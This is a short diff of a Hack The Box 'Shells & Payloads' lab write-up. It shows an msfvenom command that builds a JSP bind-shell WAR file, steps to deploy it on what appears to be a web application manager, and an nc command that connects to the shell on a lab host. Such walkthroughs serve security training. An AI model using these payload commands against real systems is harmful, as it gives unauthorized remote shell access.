Collinformatics/HackTheBox/SkillsAssessment/Shells & Payloads/writeup.md

       msfvenom -p java/jsp_shell_bind_tcp LPORT=4444 -f war > file.war

-Now we can upload and deploy file.war.
+Now we can upload and deploy file.war, if successful, it will bind a shell on port 4444.
 After it is added to the "Applications" table, click on the path "/file".
 Once the wepage has loaded run this command to connect to the shell:

       nc -nv 172.16.1.11 4444